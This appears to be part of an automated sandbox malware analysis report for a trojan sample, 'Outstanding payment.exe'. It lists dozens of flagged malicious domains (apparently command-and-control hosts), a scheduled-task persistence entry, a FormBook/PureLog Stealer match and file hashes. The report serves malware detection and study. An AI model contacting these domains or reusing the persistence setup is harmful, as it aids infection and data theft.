http://www.8oosnny.xyzReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nfluencer-marketing-13524.bond/a03d/www.atidiri.fun	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.otelhafnia.infoReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 0000000A.00000000.2116427332.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4541154394.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.otelhafnia.info/a03d/www.kkkk.shop	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.istromarmitaria.online/a03d/www.dj1.lat	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.72266.vip/a03d/www.istromarmitaria.online	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://excel.office.com	explorer.exe, 0000000A.00000000.2105292943.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097842641.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4538468202.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3096220072.0000000009B77000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 0000000A.00000000.2104136768.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2103626523.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4533350845.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	false		high
http://www.duxrib.xyzReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.aja168e.liveReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nfluencer-marketing-13524.bond/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.dj1.lat/a03d/j	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.enelog.xyzReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.duxrib.xyz/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.oftware-download-92806.bond	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.atidiri.funReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aja168e.live/a03d/www.duxrib.xyz	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.lphatechblog.xyzReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.enelog.xyz/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 0000000A.00000002.4541154394.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2116427332.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.atidiri.fun/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.behm.infoReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Outstanding payment.exe, 00000000.00000002.2111417638.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, iBSWjb.exe, 0000000B.00000002.2146532412.0000000003309000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.72266.vip	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lphatechblog.xyz	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.otelhafnia.info/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.72266.vipReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kkkk.shop/a03d/www.aja168e.live	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.oftware-download-92806.bond/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.otelhafnia.info	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/)s	explorer.exe, 0000000A.00000002.4534821677.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.dj1.latReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nfluencer-marketing-13524.bondReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000A.00000000.2117409581.000000000C8E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3096098347.000000000C8E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3096192758.000000000C8EB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.inggraphic.pro/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.atidiri.fun/a03d/www.otelhafnia.info	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.aja168e.live	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.atidiri.fun	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elnqdjc.shop/a03d/www.8oosnny.xyz	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.kkkk.shop	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.behm.info/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.72266.vip/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.inggraphic.proReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.behm.info/a03d/www.enelog.xyz	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.lphatechblog.xyz/a03d/www.oftware-download-92806.bond	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.inggraphic.pro	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8oosnny.xyz/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://outlook.com	explorer.exe, 0000000A.00000000.2105292943.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4538536779.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3096220072.0000000009D42000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.lphatechblog.xyz/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.elnqdjc.shop/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.behm.info	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.enelog.xyz	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dj1.lat	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.enelog.xyz/a03d/www.72266.vip	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.aja168e.live/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.inggraphic.pro/a03d/www.elnqdjc.shop	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.istromarmitaria.onlineReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oftware-download-92806.bond/a03d/www.behm.info	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://android.notify.windows.com/iOS	explorer.exe, 0000000A.00000002.4531583255.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2095932568.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.duxrib.xyz/a03d/www.lphatechblog.xyz	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.elnqdjc.shop	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elnqdjc.shopReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8oosnny.xyz/a03d/www.nfluencer-marketing-13524.bond	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.kkkk.shop/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.nfluencer-marketing-13524.bond	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.duxrib.xyz	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/	explorer.exe, 0000000A.00000002.4534821677.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crl.v	explorer.exe, 0000000A.00000002.4525785289.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2090992450.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.oftware-download-92806.bondReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kkkk.shopReferer:	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592447
Start date and time:	2025-01-16 06:36:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Outstanding payment.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@26/15@11/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 171 Number of non-executed functions: 297
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:36:58	API Interceptor	1x Sleep call for process: Outstanding payment.exe modified
00:37:00	API Interceptor	31x Sleep call for process: powershell.exe modified
00:37:03	API Interceptor	1x Sleep call for process: iBSWjb.exe modified
00:37:23	API Interceptor	8320899x Sleep call for process: explorer.exe modified
00:37:45	API Interceptor	7429749x Sleep call for process: msiexec.exe modified
06:37:01	Task Scheduler	Run new task: iBSWjb path: C:\Users\user\AppData\Roaming\iBSWjb.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.kkkk.shop	Invoice and packing list.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	121.254.178.252

Process:	C:\Users\user\Desktop\Outstanding payment.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
